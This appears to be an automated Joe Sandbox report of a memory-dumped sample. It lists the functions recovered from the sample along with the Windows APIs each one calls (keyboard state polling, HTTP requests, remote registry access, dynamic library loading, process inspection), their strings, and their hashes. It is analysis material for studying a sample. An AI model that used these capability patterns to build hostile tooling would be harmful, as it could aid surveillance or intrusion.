Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: aaced6457a09832f05be7c64f27d0ce9e26d20d7047289fd42714e5224ebfd3a
Instruction ID: 9d4b07cdbebdc6e59ba6a1c3a94a134b405fd9728dd0b36a4a5ebfc9a240138c
Opcode Fuzzy Hash: aaced6457a09832f05be7c64f27d0ce9e26d20d7047289fd42714e5224ebfd3a
Instruction Fuzzy Hash: 8A413CB1A00205FFDB15CF55CC84AAA7BAAEF46350B1480AAEA099F345D7F5DD44CBA0

Function 006D5A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006D5A93
GetMenuItemInfoW.USER32 ref: 006D5AAF
DeleteMenu.USER32(00000004,00000007,00000000), ref: 006D5AF5
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007518F0,00000000), ref: 006D5B3E

Strings

0, xrefs: 006D5A8B

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 464241de6db6de372a992837e5a8fce14401ca171bca7eba6f6b91a956b12503
Instruction ID: 7041ad1f0f7bad9914f70b8974372b49e859e87d8f86ce2f55131cc9bbd838b5
Opcode Fuzzy Hash: 464241de6db6de372a992837e5a8fce14401ca171bca7eba6f6b91a956b12503
Instruction Fuzzy Hash: 4341B2716047019FDB20DF24C894B5ABBE6AF85714F04461FF8569B7D1D770E900CB66

Function 006F0458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 006F0478

Part of subcall function 00697F40: _memmove.LIBCMT ref: 00697F8F

Part of subcall function 0069A2FB: _memmove.LIBCMT ref: 0069A33D

Strings

winapi, xrefs: 006F04E9
none, xrefs: 006F0553
stdcall, xrefs: 006F04FA
cdecl, xrefs: 006F04CF

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memmove$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2411302734-567219261
Opcode ID: b21121d0d12a7c4c7346d9047c3712d0ecaf4ec82e7ce3e4a81dadb829a6d617
Instruction ID: 70f94daa8420ffb79263896cbf16a96b57b6283210d3e0708d626097c02cd9c0
Opcode Fuzzy Hash: b21121d0d12a7c4c7346d9047c3712d0ecaf4ec82e7ce3e4a81dadb829a6d617
Instruction Fuzzy Hash: BC319274500619ABCF04EF98C941AFEB3BAFF15350B10862EE566976D2DB71E905CF80

Function 006CC600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006CC684
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006CC697
SendMessageW.USER32(?,00000189,?,00000000), ref: 006CC6C7

Part of subcall function 00697E53: _memmove.LIBCMT ref: 00697EB9

Strings

ListBox, xrefs: 006CC643
ComboBox, xrefs: 006CC60B

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$_memmove
String ID: ComboBox$ListBox
API String ID: 458670788-1403004172
Opcode ID: dd929c409143f1e94b396c8b1659c57a8f02ea75b5f912d70b17ad2c9ad6307c
Instruction ID: 2841bf13f03998f06aa09427ce3388157151d9d25587699bd30b24926ab6294e
Opcode Fuzzy Hash: dd929c409143f1e94b396c8b1659c57a8f02ea75b5f912d70b17ad2c9ad6307c
Instruction Fuzzy Hash: 0C21D2B1900104AEDB549BA4C885EFF77BADF05360B10851DF426E31E1DB785D069758

Function 006E4A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006E4A60
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006E4A86
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006E4AB6
InternetCloseHandle.WININET(00000000), ref: 006E4AFD

Part of subcall function 006E56A9: GetLastError.KERNEL32(?,?,006E4A2B,00000000,00000000,00000001), ref: 006E56BE

Strings

, xrefs: 006E4AAF

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: ea02c92d5eb404f7c837dab7de10ae73b415948b9a2e498f38f4ce8e66f5a027
Instruction ID: 0eee5741bc6e2ee6d795b901d1f26fd71d6e0cbf562c6c4331ce89e5ac8fa471
Opcode Fuzzy Hash: ea02c92d5eb404f7c837dab7de10ae73b415948b9a2e498f38f4ce8e66f5a027
Instruction Fuzzy Hash: C121D0B5541308BFEB11DF6A9CC4EFB76EEEB48758F10802AF10592280EE649D054B68

Function 006938E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0070454E

Part of subcall function 00697E53: _memmove.LIBCMT ref: 00697EB9

_memset.LIBCMT ref: 00693965
_wcscpy.LIBCMT ref: 006939B5
Shell_NotifyIconW.SHELL32(00000001,?), ref: 006939C6

Strings

Line: , xrefs: 00704578

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 40e59919f89b9e9e4fabb06d471047edfdcd06f41f5163d9e30c0a26a2ff62fc
Instruction ID: 644eb9d4ed6152a0a9cc8bc6cd0d0c12b227270cab8488153182b813d2d6c989
Opcode Fuzzy Hash: 40e59919f89b9e9e4fabb06d471047edfdcd06f41f5163d9e30c0a26a2ff62fc
Instruction Fuzzy Hash: 9E31F871408350ABDB61EB60DC41FDF77EDAF44311F40851EF589826A1EBB49B48CB9A

Function 006F8EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 006AC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 006AC657
Part of subcall function 006AC619: GetStockObject.GDI32(00000011), ref: 006AC66B
Part of subcall function 006AC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 006AC675

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 006F8F69
LoadLibraryW.KERNEL32(?), ref: 006F8F70
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 006F8F85
DestroyWindow.USER32(?), ref: 006F8F8D

Strings

SysAnimate32, xrefs: 006F8F44

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: ea259bf32b57e69c56726d300200e59032e6d8edb6ab7837a68f36ed34b0866d
Instruction ID: 526f179184bcba2589e8cb3d4c8e822cd437c12d28cff4f50b71e84bc4fc9758
Opcode Fuzzy Hash: ea259bf32b57e69c56726d300200e59032e6d8edb6ab7837a68f36ed34b0866d
Instruction Fuzzy Hash: 7D219D71201209AFEF105E64DC80EFB77ABEB593A4F108668FB1497290CB71DC519B64

Function 006DE382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 006DE392
GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 006DE3E6
__swprintf.LIBCMT ref: 006DE3FF
SetErrorMode.KERNEL32(00000000,00000001,00000000,0072DBF0), ref: 006DE43D

Strings

%lu, xrefs: 006DE3F9

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: e869e189ab43b72c0985720d76bf3a8beaba3815a5f23d78c128166b5143e1f7
Instruction ID: ffee26665897a4711418644b2442dc5100755ed08e73cd0177d0c57bbfd5632e
Opcode Fuzzy Hash: e869e189ab43b72c0985720d76bf3a8beaba3815a5f23d78c128166b5143e1f7
Instruction Fuzzy Hash: C5217F75A40108AFCB10EBA4CC85DEEB7BAEF49710F108069F509DB291D735DE01CB50

Function 006CD7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00697E53: _memmove.LIBCMT ref: 00697EB9

Part of subcall function 006CD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 006CD640
Part of subcall function 006CD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 006CD653
Part of subcall function 006CD623: GetCurrentThreadId.KERNEL32 ref: 006CD65A
Part of subcall function 006CD623: AttachThreadInput.USER32(00000000), ref: 006CD661

GetFocus.USER32 ref: 006CD7FB

Part of subcall function 006CD66C: GetParent.USER32(?), ref: 006CD67A

GetClassNameW.USER32(?,?,00000100), ref: 006CD844
EnumChildWindows.USER32(?,006CD8BA), ref: 006CD86C
__swprintf.LIBCMT ref: 006CD886

Strings

%s%d, xrefs: 006CD880

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 0d74f904333140345091ca03507575d369e72bedb6cda5b69d11ef6ae087a811
Instruction ID: f60b4aa2e76175d44bcae66fbb108aa24cc346290a61239b682b46a083099fa4
Opcode Fuzzy Hash: 0d74f904333140345091ca03507575d369e72bedb6cda5b69d11ef6ae087a811
Instruction Fuzzy Hash: C01172B16002056BDF517F549C89FFA377EEB44704F0080BDF909AA186DB785945CB74

Function 006F1836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006F18E4
GetProcessIoCounters.KERNEL32(00000000,?), ref: 006F1917
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 006F1A3A
CloseHandle.KERNEL32(?), ref: 006F1AB0

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 9e7a75ddc8a6464ec0bca4bd2d9cdb386a66e031714d29957ffea88f648bff5e
Instruction ID: 4028c4d58017172a66535b8710c46e66aeb9cb7d47c09d40d82bd208a931fadc
Opcode Fuzzy Hash: 9e7a75ddc8a6464ec0bca4bd2d9cdb386a66e031714d29957ffea88f648bff5e
Instruction Fuzzy Hash: D4818F70A40205EBDF10AF68C886BAD7BE6EF49760F04C459F915AF382D7B4AD418F94

Function 006F0579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 006984A6: __swprintf.LIBCMT ref: 006984E5
Part of subcall function 006984A6: __itow.LIBCMT ref: 00698519

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 006F05DF
GetProcAddress.KERNEL32(00000000,?), ref: 006F066E
GetProcAddress.KERNEL32(00000000,00000000), ref: 006F068C
GetProcAddress.KERNEL32(00000000,?), ref: 006F06D2
FreeLibrary.KERNEL32(00000000,00000004), ref: 006F06EC

Part of subcall function 006AF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,006DAEA5,?,?,00000000,00000008), ref: 006AF282
Part of subcall function 006AF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,006DAEA5,?,?,00000000,00000008), ref: 006AF2A6

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 8e20f66e010f92a40abfe0bb2090998b82024d6102c59fde4e44b5388e538e6d
Instruction ID: efa8741a4a500e61e63efdf7cb35bd8ac2fa47ced5947049b59ff94511d7601f
Opcode Fuzzy Hash: 8e20f66e010f92a40abfe0bb2090998b82024d6102c59fde4e44b5388e538e6d
Instruction Fuzzy Hash: 98514A75A00209DFDF00EFA8C9919EDB7BAAF49310B148069EA15AB352DB34ED05CF54

Function 006F2D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

Part of subcall function 006F3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006F2AA6,?,?), ref: 006F3B0E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006F2DE0
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006F2E1F
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006F2E66
RegCloseKey.ADVAPI32(?,?), ref: 006F2E92
RegCloseKey.ADVAPI32(00000000), ref: 006F2E9F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 54a4e0b6cecadf92ef747dc901a48e77224a7600698fc10ad1202a5171c0e97c
Instruction ID: 09ce779ad25a83253f7a4ef580c234a9f347952db37ab4fd29fc44d7da03d505
Opcode Fuzzy Hash: 54a4e0b6cecadf92ef747dc901a48e77224a7600698fc10ad1202a5171c0e97c
Instruction Fuzzy Hash: 09515C71204209AFC744EF64C891EAAB7EAFF88714F14881EF695872A1DB31E905CF56

Function 006FCB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 821c5e8cd43decff699b887e7478b2c43ad9d2e015e6f03a9ef2b593b3586e24
Instruction ID: a6f43f33e5b05704860cca1a8b846acfb8c2763b29d2720b63ae355e3780c4a2
Opcode Fuzzy Hash: 821c5e8cd43decff699b887e7478b2c43ad9d2e015e6f03a9ef2b593b3586e24
Instruction Fuzzy Hash: 3941D23990020DABD720DB68CE49FF9BB6AAB09330F158255EA19A72D1C774AD01DA54

Function 006E1726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006E17D4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006E17FD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 006E183C

Part of subcall function 006984A6: __swprintf.LIBCMT ref: 006984E5
Part of subcall function 006984A6: __itow.LIBCMT ref: 00698519

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 006E1861
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006E1869

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 3458ec3b3225cf7cc735fd6ea529d3ed68fc43edc5604173c58a8e4186859a5e
Instruction ID: f45abe0509836a71901ff47ac3fa3270146f9a0af7d5db37d8325f924ea48e94
Opcode Fuzzy Hash: 3458ec3b3225cf7cc735fd6ea529d3ed68fc43edc5604173c58a8e4186859a5e
Instruction Fuzzy Hash: 8941F735A00205DFCF51EF64C981AAEBBFAEF49310B1480A9E805AB361DB35ED41DB54

Function 006AB736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 006AB749
ScreenToClient.USER32(00000000,000000FF), ref: 006AB766
GetAsyncKeyState.USER32(00000001), ref: 006AB78B
GetAsyncKeyState.USER32(00000002), ref: 006AB799

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
